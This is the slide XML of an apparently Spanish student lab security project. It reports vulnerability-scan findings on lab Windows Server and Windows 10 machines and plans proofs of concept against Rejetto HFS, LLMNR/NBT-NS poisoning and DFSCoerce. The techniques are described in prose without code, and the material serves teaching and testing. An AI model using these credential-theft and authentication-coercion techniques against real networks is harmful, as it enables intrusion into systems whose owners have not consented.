                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F39A67DC-4243-E0D6-617A-0539119A706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21760" y="2108384"/>
            <a:ext cx="6645910" cy="3347085"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Cuadro de texto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57CEB060-235A-A6B5-D35C-4C8536DDCE13}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8419732" y="2087028"/>
            <a:ext cx="2475230" cy="119032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Siendo la vulnerabilidad grave una vulnerabilidad  Apache Struts 2 s:a.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" kern="100" dirty="0">
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Que afecta a las aplicaciones que usan Apache Struts 2</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1100" kern="100" dirty="0">
              <a:effectLst/>
              <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="es-ES" sz="1100" kern="100" dirty="0">
              <a:effectLst/>
              <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Cuadro de texto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64A14017-2FDE-DE1C-0B67-807FCAAE8F9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8419732" y="3475220"/>
            <a:ext cx="2475230" cy="98514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a typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Y SMB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" kern="100" dirty="0" err="1">
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Signing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" kern="100" dirty="0">
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" kern="100" dirty="0" err="1">
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" kern="100" dirty="0">
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" kern="100" dirty="0" err="1">
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>requiered</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" kern="100" dirty="0">
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>, que es una vulnerabilidad den un protocolo que sirve para compartir recursos en la red. Siendo esta la de nivel medio.</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="11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76732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5332176-DD81-32C1-801A-5F0F9CF94A15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677333" y="513347"/>
            <a:ext cx="10985277" cy="5528015"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Windows Server 2019 DC01:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Crítico:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Imagen 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD4158F2-C561-F478-A741-9AECAFC3D3A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74687" y="2140468"/>
            <a:ext cx="6645910" cy="3347085"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Cuadro de texto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DF4DABE-B2CD-7091-EA0D-294A3858D2A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8802297" y="2140468"/>
            <a:ext cx="2475230" cy="62286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Siendo vulnerabilidades por no tener aplicados los parches de Windows</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="200517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389AA3-DD3B-7B4A-DBCF-2356CCF098FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Explicación de contorno</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Marcador de contenido 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E83A752E-0F99-B64C-97E9-BA8657B5C60C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Para realizar este proyecto usaré estas máquinas -&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Dos Windows Server 2019 v1809 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Build</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> 17763,737</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Un Windows 10 20H2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Tendiendo estas IP:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Máquina Windows 10: 192,168,1,135</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Maquina Windows 2019 DC01: 192,168,1,79</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Máquina Windows 2019 DC02: 192,168,1,80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="303760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DA05B13-DD37-F31D-0E6C-AED9B05E471A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="385011"/>
            <a:ext cx="10648392" cy="5656351"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Alto:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Imagen 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89E7BDFE-1461-E99C-C522-08D7C5F4E77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74687" y="1210025"/>
            <a:ext cx="6645910" cy="3347085"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Cuadro de texto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C7AA8EC-A67B-215B-E822-64DF209F747A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8685546" y="1210025"/>
            <a:ext cx="2475230" cy="80400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Siendo vulnerabilidades del servidor de certificados por usar un algoritmo de cifrado débil que </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" kern="100" dirty="0" err="1">
                <a:effectLst/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>wn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" kern="100" dirty="0">
                <a:effectLst/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> este caso es sha1.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3641068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76A3C52-22DB-CC87-EDC0-D5747663D242}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="385011"/>
            <a:ext cx="10889024" cy="5656351"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Medio:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Imagen 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{258307E8-1FFD-9223-EBBC-63456B11F0FE}"/>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67629" y="1219603"/>
            <a:ext cx="6645910" cy="3347085"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Cuadro de texto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6E0C823-96B4-27CA-2922-75B046BAAAFC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8765757" y="1539643"/>
            <a:ext cx="2475230" cy="44172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Siendo vulnerabilidades de Flash Player, Net Framework</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2773725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E45C94-875B-9F36-2D8E-B365D22BB78F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>POC</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Marcador de contenido 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B683AC5-BB20-B2BF-273D-2D1C9A234F9F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Realizaré estas POC:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Máquina Windows 10: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Rejetto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> HTTP File Server (HFS) 2.3.x</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Máquina Windows Server:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Envenenamiento LLMNR-NBT-NS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>La vulnerabilidad de robo de credenciales de red mediante envenenamiento LLMNR-NBT-NS permite a un atacante interceptar y obtener las credenciales de inicio de sesión de los usuarios en una red. Aprovecha las debilidades en los protocolos LLMNR (Link-Local </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Multicast</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Resolution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>), NBT-NS (NetBIOS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Service</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>) para redirigir las solicitudes de resolución de nombres y obtener acceso no autorizado a las credenciales de red.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1035535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37CA251-174E-E438-7BD8-3F6F88F5D6EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="481263"/>
            <a:ext cx="8596668" cy="6240379"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>DFSCoerce</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>DFSCoerce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> apunta al sistema de archivos distribuidos de Windows para forzar la autentificación, sin que DFS se tenga que ejecutar en el dominio.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>DFSCoerce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> hace uso del protocolo MS-DFSNM para forzar a un controlador de dominio a autentificarse contra la máquina controlado por el atacante.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>roporciona la capacidad de operar el sistema de archivos distribuido de Windows (DFS) a través de una interfaz de llamada a procedimiento remoto (RPC).</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:effectLst/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Concretamente y por el momento, el método usado es </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1">
                <a:effectLst/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>NetrDfsRemoveStdRoot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:effectLst/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
